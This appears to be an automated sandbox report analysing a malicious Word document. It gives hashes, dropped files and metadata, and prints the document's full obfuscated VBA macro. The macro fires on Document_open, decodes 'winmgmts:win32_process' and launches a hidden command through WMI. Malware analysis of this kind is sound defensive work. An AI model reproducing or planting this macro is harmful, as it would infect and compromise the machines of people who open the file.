                                                    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                    C:\Users\user\Desktop\~$ck-91089 416755919.doc
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.431160061181642
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                    MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                    SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                    SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                    SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                    Malicious:false
                                                    Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                    C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):200625
                                                    Entropy (8bit):7.475412526926351
                                                    Encrypted:false
                                                    SSDEEP:3072:C9zwbpDnn9FfrNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:C9zsl9FTaBYF0nVp2MJHybR8dS9
                                                    MD5:219F4446B1F7684D99A4E8DE99F12E6A
                                                    SHA1:C932AB01AA4B1540692EC774A801B7A998EE08AB
                                                    SHA-256:45F52C1B6156AA69BE0E215DA63C58CD83E866435264E9298F84DE7B6F8BE1AB
                                                    SHA-512:E21BE56A5231B5C42DDD6A0C5F72F91D6B6BCF330A7ADB7750AE6988121E00124676585798E39DE30153026E708AF4CDC38FA6A57828499B6818DB30D300A484
                                                    Malicious:false
                                                    Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

                                                    Static File Info

                                                    General

                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Missouri success Senior Refined Cambridgeshire Refined Rubber Keyboard wireless Markets Concrete hacking, Author: Gabriel Andre, Template: Normal.dotm, Last Saved By: Lisa Gerard, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 10:15:00 2021, Last Saved Time/Date: Tue Jan 5 10:15:00 2021, Number of Pages: 1, Number of Words: 2640, Number of Characters: 15049, Security: 8
                                                    Entropy (8bit):6.707687869365253
                                                    TrID:
                                                    • Microsoft Word document (32009/1) 79.99%
                                                    • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                    File name:pack-91089 416755919.doc
                                                    File size:170237
                                                    MD5:1dc95341c113473f3ac71d3fccdc3512
                                                    SHA1:d07202389ee1458cd8d3f8f000701bc537ec6797
                                                    SHA256:700f121e98f06604e45498c6313d741f4c43582fa41e1cdda3ae1b0e17e1e62c
                                                    SHA512:1778833f10d53e992d33784be9ab872d9eb2b5acdca45438d2b512dc32fbee9b666c42e569bc00525046308a965bed3a6bbf76fe391fb137eb9207491ed10b56
                                                    SSDEEP:3072:4D9ufstRUUKSns8T00JSHUgteMJ8qMD7gC:4D9ufsfgIf0pLC
                                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                                    File Icon

                                                    Icon Hash:e4eea2aaa4b4b4a4

                                                    Static OLE Info

                                                    General

                                                    Document Type:OLE
                                                    Number of OLE Files:1

                                                    OLE File "pack-91089 416755919.doc"

                                                    Indicators

                                                    Has Summary Info:True
                                                    Application Name:Microsoft Office Word
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:True
                                                    Contains Workbook/Book Stream:False
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:
                                                    Flash Objects Count:
                                                    Contains VBA Macros:True

                                                    Summary

                                                    Code Page:1252
                                                    Title:
                                                    Subject:Missouri success Senior Refined Cambridgeshire Refined Rubber Keyboard wireless Markets Concrete hacking
                                                    Author:Gabriel Andre
                                                    Keywords:
                                                    Comments:
                                                    Template:Normal.dotm
                                                    Last Saved By:Lisa Gerard
                                                    Revion Number:1
                                                    Total Edit Time:0
                                                    Create Time:2021-01-05 10:15:00
                                                    Last Saved Time:2021-01-05 10:15:00
                                                    Number of Pages:1
                                                    Number of Words:2640
                                                    Number of Characters:15049
                                                    Creating Application:Microsoft Office Word
                                                    Security:8

                                                    Document Summary

                                                    Document Code Page:-535
                                                    Number of Lines:125
                                                    Number of Paragraphs:35
                                                    Thumbnail Scaling Desired:False
                                                    Company:
                                                    Contains Dirty Links:False
                                                    Shared Document:False
                                                    Changed Hyperlinks:False
                                                    Application Version:917504

                                                    Streams with VBA

                                                    VBA File Name: A5gd21klfqu9c6rs, Stream Size: 1117
                                                    General
                                                    Stream Path:Macros/VBA/A5gd21klfqu9c6rs
                                                    VBA File Name:A5gd21klfqu9c6rs
                                                    Stream Size:1117
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 49 85 f4 e6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                    VBA Code Keywords

                                                    Keyword
                                                    False
                                                    Private
                                                    VB_Exposed
                                                    Attribute
                                                    VB_Creatable
                                                    VB_Name
                                                    Document_open()
                                                    VB_Customizable
                                                    VB_PredeclaredId
                                                    VB_GlobalNameSpace
                                                    VB_Base
                                                    VB_TemplateDerived
                                                    VBA Code
                                                    Attribute VB_Name = "A5gd21klfqu9c6rs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
G8xesq0b8jlsfrsp
End Sub
                                                    VBA File Name: Owppnp8hah4xo788, Stream Size: 17915
                                                    General
                                                    Stream Path:Macros/VBA/Owppnp8hah4xo788
                                                    VBA File Name:Owppnp8hah4xo788
                                                    Stream Size:17915
                                                    Data ASCII:. . . . . . . . . | . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . I . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:01 16 01 00 00 f0 00 00 00 7c 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 83 06 00 00 a3 30 00 00 00 00 00 00 01 00 00 00 49 85 65 07 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                    VBA Code Keywords

                                                    Keyword
                                                    DpYbmDA
                                                    oAaNlB
                                                    vrYYHIDxI
                                                    WTbkNqFa
                                                    Object
                                                    RjiQHRA
                                                    "bBmgOCvPPojGGC"
                                                    MNihxICY
                                                    DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
                                                    GfRPP
                                                    tWcKo
                                                    OMZxxg
                                                    "lwWhZGEasjsS"
                                                    "deVdMyoREdgzCaJb"
                                                    fDZVKAAc:
                                                    uWZkeMFv.WriteLine
                                                    xLQtMd
                                                    nleaHR
                                                    gEcrV:
                                                    "OyFBLhlWUnD"
                                                    uWZkeMFv.Close
                                                    xsruLB
                                                    zDsRaIBGF
                                                    mgrwfmN
                                                    "XZzpBRpDKuMgsGHIHF"
                                                    "VrVKCjefsIJ"
                                                    pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
                                                    SblcDCC:
                                                    SQQWY
                                                    "hbtzFRJEXyDCXI"
                                                    iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
                                                    sCOIGDtD:
                                                    gxBPJB
                                                    jbUmDI
                                                    DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
                                                    "BnxHFzJCGhVHrFIm"
                                                    IcAHwPH
                                                    iFTmFHFH
                                                    STzBjwICv
                                                    kwzjKvZHe
                                                    fDZVKAAc.WriteLine
                                                    plqkuDI
                                                    RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
                                                    ZMdrVHGz:
                                                    SeHafBC
                                                    nhLeJMLfI
                                                    EISYDDB
                                                    EhCMG
                                                    UDSpFHqFJ
                                                    WlBWDXGD
                                                    "NisSEYrcDlKQUITa"
                                                    "dXFPCSYtSNB"
                                                    "NeiIGCNWgICn"
                                                    OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
                                                    mgrwfmN.Close
                                                    YVZXECEHD
                                                    FLtYjKHC
                                                    GfRPP.Close
                                                    idbaDIr
                                                    "dnUnKFHAkIOdD"
                                                    "nJJzFRjEWpRikxCD"
                                                    ANzGyzCD
                                                    MmSDYCkJR
                                                    "hKlajOujwgDFAA"
                                                    "eeVVJBMGlcfXMB"
                                                    RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
                                                    iHKuDmaEr:
                                                    "CcDmClHsnCC"
                                                    "UjBKOEDRIbiWFB"
                                                    QOrvJEB
                                                    "sxbwAfRtWJI"
                                                    UskmBJF
                                                    "KqVyuQQfwTWh"
                                                    tpOgXmm
                                                    fiyQuiRBI
                                                    gphNDVZp
                                                    vEBqHrDnD
                                                    PbhYVsA.Close
                                                    ZMdrVHGz.Close
                                                    "vVbvIHcFGEAJJ"
                                                    CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
                                                    KmGOADt
                                                    Resume
                                                    phIwFD
                                                    jPJENIo
                                                    AiRdGDAJ
                                                    KmGOADt.Close
                                                    "]an"
                                                    PnolTIbAB
                                                    "eEWdaDQVJJqTHgF"
                                                    gxBPJB:
                                                    eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
                                                    FYVZFEH
                                                    tzErBRFe
                                                    "LvnHAGHfIhRDBRAF"
                                                    NuebA:
                                                    sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
                                                    oQgLUI
                                                    SblcDCC.Close
                                                    HCvCmAcHC
                                                    "eXpjHFapHaPdRJu"
                                                    eepvDEaE
                                                    "DBvMcNtCcMyJDDI"
                                                    MHYlQAD
                                                    "ekluIEBJFIgoBcGC"
                                                    dXiwA
                                                    "MiCjaGqJfPrI"
                                                    eCIzUDyJ
                                                    RyDBDK
                                                    hFSyAfFrF
                                                    "fDdPHEjBEnAdZqZFJ"
                                                    zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
                                                    "MxCpGaGqBgemCAFEJ"
                                                    PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
                                                    sCOIGDtD.Close
                                                    uWZkeMFv
                                                    gzTFLxb
                                                    IePCGy
                                                    swNGWdd
                                                    qHKYGHlFA
                                                    OIbfvEEFF
                                                    CHVmaVC
                                                    ZMdrVHGz
                                                    TXmxvp
                                                    quDoH
                                                    iHKuDmaEr.WriteLine
                                                    KXTliE
                                                    ddanFDWJf
                                                    rJEkbLH
                                                    fNhiCVgGS:
                                                    noebIvSiu
                                                    YZllAeRe
                                                    VB_Name
                                                    "eXObOTlBAITEOIo"
                                                    mgrwfmN:
                                                    LzxxRHG
                                                    inIcjJtaF
                                                    EKmLA
                                                    uVItICICB
                                                    mgrwfmN.WriteLine
                                                    KXwaABT
                                                    fDZVKAAc.Close
                                                    Mid(Application.Name,
                                                    fmwdEMADQ
                                                    lBenBDA
                                                    SblcDCC
                                                    mgTNFCq
                                                    NuebA.WriteLine
                                                    hXxQDACJA
                                                    KmGOADt.WriteLine
                                                    HCvCmAcHC.Close
                                                    yJmmmVIAG
                                                    rYbgBh:
                                                    iHKuDmaEr.Close
                                                    NuebA.Close
                                                    hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
                                                    ZMdrVHGz.WriteLine
                                                    OlapGi
                                                    zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
                                                    "CVbRCAAhkhmcDG"
                                                    HCvCmAcHC:
                                                    BNmrm
                                                    rYbgBh
                                                    "WNFUDvHgghFdup"
                                                    uRnkDGJ
                                                    "qiXBsMBsLJGbX"
                                                    yabVbA
                                                    zBSWCKmJv
                                                    bbsIZ
                                                    "zdTcdOoXXUFHJK"
                                                    xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
                                                    RqlOZAHRJ
                                                    fNhiCVgGS.WriteLine
                                                    hjZwD
                                                    "EgxfIDVQbJotWhj"
                                                    "BUUJYAAIoJvLBLAo"
                                                    PcHRGIADo
                                                    wTMSLyWFG
                                                    sCOIGDtD
                                                    PbhYVsA:
                                                    "BndJDkuVYF"
                                                    KmGOADt:
                                                    "RhnJRGeBNASBQHHGF"
                                                    anyPG
                                                    "JTSPCDjykfL"
                                                    sreXHFD
                                                    "XrrAwQZPjqB"
                                                    hoyzuBGCP
                                                    UavHTIBHo
                                                    qAUhkIMz
                                                    EKezHIC
                                                    PjNhJNA
                                                    GznGGHyG
                                                    UwyYSBsBN
                                                    ORLICIl
                                                    cwsTFPCH
                                                    "]anw["
                                                    drZcHkCm
                                                    hDJDJ
                                                    NXbmIuHX
                                                    Function
                                                    "syYTHJShrguhzb"
                                                    AioOpBFE
                                                    xiFRA
                                                    fmwdEMADQ.WriteLine
                                                    gxBPJB.Close
                                                    NZiApKAp
                                                    gEcrV.Close
                                                    "mehEFPFHcklgJDDx"
                                                    iHKuDmaEr
                                                    pULquU
                                                    SblcDCC.WriteLine
                                                    pkixJADG:
                                                    xkQqDXCcD
                                                    GIAKA
                                                    "TubioGUTLadgXbA"
                                                    "anBQXljzGenE"
                                                    xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
                                                    fDZVKAAc
                                                    ecGmY
                                                    "ptABFEZDmkMVIeD"
                                                    "TBKmUCEXTUIGu"
                                                    "fxSJajCGlWUEBW"
                                                    rYbgBh.WriteLine
                                                    DhnHIY
                                                    sCOIGDtD.WriteLine
                                                    tAmQHxlD
                                                    tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
                                                    "wypNISsWSXthFJCq"
                                                    eLmLDU
                                                    jENfzNH
                                                    gEcrV.WriteLine
                                                    Nothing
                                                    "uTtCAFwHpCGF"
                                                    PbhYVsA
                                                    gEcrV
                                                    NuebA
                                                    "aqGiHISIbAoabV"
                                                    fNhiCVgGS.Close
                                                    jsYAGBJAF
                                                    RhztCF
                                                    lADFBaJ
                                                    FUyIHBDFz
                                                    sPkIwu
                                                    ViWsSIH
                                                    gxBPJB.WriteLine
                                                    zZuzBZGD
                                                    pkixJADG.WriteLine
                                                    MznOjBB
                                                    fmwdEMADQ.Close
                                                    sTzDC
                                                    "oLweAMoGsqVE"
                                                    diCXTi
                                                    GfRPP.WriteLine
                                                    Error
                                                    uWZkeMFv:
                                                    xPBGH
                                                    Attribute
                                                    sySRJ
                                                    "WLXLJnjItPGPZJ"
                                                    "JMgUDAIEJlgyNBH"
                                                    jzqBlGW
                                                    CFdSBD
                                                    pkixJADG.Close
                                                    ibIiBF
                                                    "qDaYIDDSZQMTaO"
                                                    pkixJADG
                                                    GfRPP:
                                                    LQqlBAHD
                                                    dLRiF
                                                    "ImJJdfAtdFHCh"
                                                    PbhYVsA.WriteLine
                                                    DkLoDL
                                                    RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
                                                    fNhiCVgGS
                                                    fmwdEMADQ:
                                                    rYbgBh.Close
                                                    zxgLHJSFW
                                                    HCvCmAcHC.WriteLine
                                                    hZCth
                                                    VBA Code
                                                    Attribute VB_Name = "Owppnp8hah4xo788"
Function G8xesq0b8jlsfrsp()
On Error Resume Next
Dhubl2is48jort = "Jsnt2t9fi0a8nnsiaf" + "Bete9x47doew46v"
sf4 = Zw1k7hcmdl66 + A5gd21klfqu9c6rs.StoryRanges.Item(2 / 2) + Hyii7r76oq89
   GoTo SblcDCC
Dim pULquU As Object
Set ibIiBF = diCXTi
Set pULquU = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim SblcDCC As Object
Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
SblcDCC.WriteLine "VrVKCjefsIJ"
SblcDCC.WriteLine "sxbwAfRtWJI"
SblcDCC.WriteLine "WLXLJnjItPGPZJ"
Set jbUmDI = NZiApKAp
SblcDCC.Close
Set pULquU = Nothing
Set MznOjBB = vrYYHIDxI
Set SblcDCC = Nothing
SblcDCC:
t3s = "]anw[3" + "p]anw[3"
K50yjh8o6l7s = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
   GoTo fNhiCVgGS
Dim RyDBDK As Object
Set WTbkNqFa = gzTFLxb
Set RyDBDK = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fNhiCVgGS As Object
Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
fNhiCVgGS.WriteLine "ImJJdfAtdFHCh"
fNhiCVgGS.WriteLine "deVdMyoREdgzCaJb"
fNhiCVgGS.WriteLine "XZzpBRpDKuMgsGHIHF"
Set OlapGi = PjNhJNA
fNhiCVgGS.Close
Set RyDBDK = Nothing
Set yabVbA = oAaNlB
Set fNhiCVgGS = Nothing
fNhiCVgGS:
Brlo236t2rmfu = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"
   GoTo HCvCmAcHC
Dim iFTmFHFH As Object
Set UDSpFHqFJ = sySRJ
Set iFTmFHFH = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim HCvCmAcHC As Object
Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
HCvCmAcHC.WriteLine "uTtCAFwHpCGF"
HCvCmAcHC.WriteLine "lwWhZGEasjsS"
HCvCmAcHC.WriteLine "MiCjaGqJfPrI"
Set MmSDYCkJR = UwyYSBsBN
HCvCmAcHC.Close
Set iFTmFHFH = Nothing
Set EISYDDB = tpOgXmm
Set HCvCmAcHC = Nothing
HCvCmAcHC:
Iogna_9cq5gv = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"
   GoTo gEcrV
Dim RqlOZAHRJ As Object
Set jsYAGBJAF = MHYlQAD
Set RqlOZAHRJ = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim gEcrV As Object
Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
gEcrV.WriteLine "dXFPCSYtSNB"
gEcrV.WriteLine "KqVyuQQfwTWh"
gEcrV.WriteLine "qDaYIDDSZQMTaO"
Set IePCGy = GznGGHyG
gEcrV.Close
Set RqlOZAHRJ = Nothing
Set cwsTFPCH = bbsIZ
Set gEcrV = Nothing
gEcrV:
Fo4b_d8mj9usjgaha = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"
   GoTo ZMdrVHGz
Dim xsruLB As Object
Set fiyQuiRBI = swNGWdd
Set xsruLB = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim ZMdrVHGz As Object
Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
ZMdrVHGz.WriteLine "MxCpGaGqBgemCAFEJ"
ZMdrVHGz.WriteLine "hbtzFRJEXyDCXI"
ZMdrVHGz.WriteLine "zdTcdOoXXUFHJK"
Set xPBGH = rJEkbLH
ZMdrVHGz.Close
Set xsruLB = Nothing
Set dLRiF = vEBqHrDnD
Set ZMdrVHGz = Nothing
ZMdrVHGz:
K427k3xfk130n18n = Iogna_9cq5gv + Fo4b_d8mj9usjgaha + Brlo236t2rmfu + t3s + K50yjh8o6l7s
   GoTo fDZVKAAc
Dim tzErBRFe As Object
Set SeHafBC = tWcKo
Set tzErBRFe = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fDZVKAAc As Object
Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
fDZVKAAc.WriteLine "hKlajOujwgDFAA"
fDZVKAAc.WriteLine "JMgUDAIEJlgyNBH"
fDZVKAAc.WriteLine "BUUJYAAIoJvLBLAo"
Set CHVmaVC = LzxxRHG
fDZVKAAc.Close
Set tzErBRFe = Nothing
Set WlBWDXGD = EKezHIC
Set fDZVKAAc = Nothing
fDZVKAAc:
Lutf6_3d403q9 = Jlda77h_v8nx5(K427k3xfk130n18n)
   GoTo rYbgBh
Dim hZCth As Object
Set LQqlBAHD = DpYbmDA
Set hZCth = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim rYbgBh As Object
Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
rYbgBh.WriteLine "CVbRCAAhkhmcDG"
rYbgBh.WriteLine "XrrAwQZPjqB"
rYbgBh.WriteLine "fxSJajCGlWUEBW"
Set phIwFD = hDJDJ
rYbgBh.Close
Set hZCth = Nothing
Set PnolTIbAB = dXiwA
Set rYbgBh = Nothing
rYbgBh:
Set Mwzin4vxc1irit = CreateObject(Lutf6_3d403q9)
   GoTo GfRPP
Dim xLQtMd As Object
Set uRnkDGJ = hFSyAfFrF
Set xLQtMd = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim GfRPP As Object
Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
GfRPP.WriteLine "qiXBsMBsLJGbX"
GfRPP.WriteLine "mehEFPFHcklgJDDx"
GfRPP.WriteLine "BndJDkuVYF"
Set xiFRA = hXxQDACJA
GfRPP.Close
Set xLQtMd = Nothing
Set jENfzNH = xkQqDXCcD
Set GfRPP = Nothing
GfRPP:
Jaaqx1xn5daotw = Mid(sf4, (1 + 4), Len(sf4))
   GoTo sCOIGDtD
Dim eepvDEaE As Object
Set jzqBlGW = lBenBDA
Set eepvDEaE = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim sCOIGDtD As Object
Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
sCOIGDtD.WriteLine "JTSPCDjykfL"
sCOIGDtD.WriteLine "bBmgOCvPPojGGC"
sCOIGDtD.WriteLine "anBQXljzGenE"
Set tAmQHxlD = UavHTIBHo
sCOIGDtD.Close
Set eepvDEaE = Nothing
Set gphNDVZp = IcAHwPH
Set sCOIGDtD = Nothing
sCOIGDtD:
   GoTo fmwdEMADQ
Dim DkLoDL As Object
Set plqkuDI = BNmrm
Set DkLoDL = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fmwdEMADQ As Object
Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
fmwdEMADQ.WriteLine "dnUnKFHAkIOdD"
fmwdEMADQ.WriteLine "ekluIEBJFIgoBcGC"
fmwdEMADQ.WriteLine "BnxHFzJCGhVHrFIm"
Set jPJENIo = FLtYjKHC
fmwdEMADQ.Close
Set DkLoDL = Nothing
Set ANzGyzCD = qAUhkIMz
Set fmwdEMADQ = Nothing
fmwdEMADQ:
Mwzin4vxc1irit.Create Jlda77h_v8nx5(Jaaqx1xn5daotw), V2enhc4htwl7z6bh, Thriap3q9rgf3yy9y
   GoTo pkixJADG
Dim DhnHIY As Object
Set oQgLUI = zZuzBZGD
Set DhnHIY = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim pkixJADG As Object
Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
pkixJADG.WriteLine "fDdPHEjBEnAdZqZFJ"
pkixJADG.WriteLine "wypNISsWSXthFJCq"
pkixJADG.WriteLine "LvnHAGHfIhRDBRAF"
Set ecGmY = OIbfvEEFF
pkixJADG.Close
Set DhnHIY = Nothing
Set EKmLA = eLmLDU
Set pkixJADG = Nothing
pkixJADG:
   GoTo KmGOADt
Dim CFdSBD As Object
Set nhLeJMLfI = FYVZFEH
Set CFdSBD = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim KmGOADt As Object
Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
KmGOADt.WriteLine "DBvMcNtCcMyJDDI"
KmGOADt.WriteLine "eXpjHFapHaPdRJu"
KmGOADt.WriteLine "eXObOTlBAITEOIo"
Set STzBjwICv = hoyzuBGCP
KmGOADt.Close
Set CFdSBD = Nothing
Set ORLICIl = lADFBaJ
Set KmGOADt = Nothing
KmGOADt:
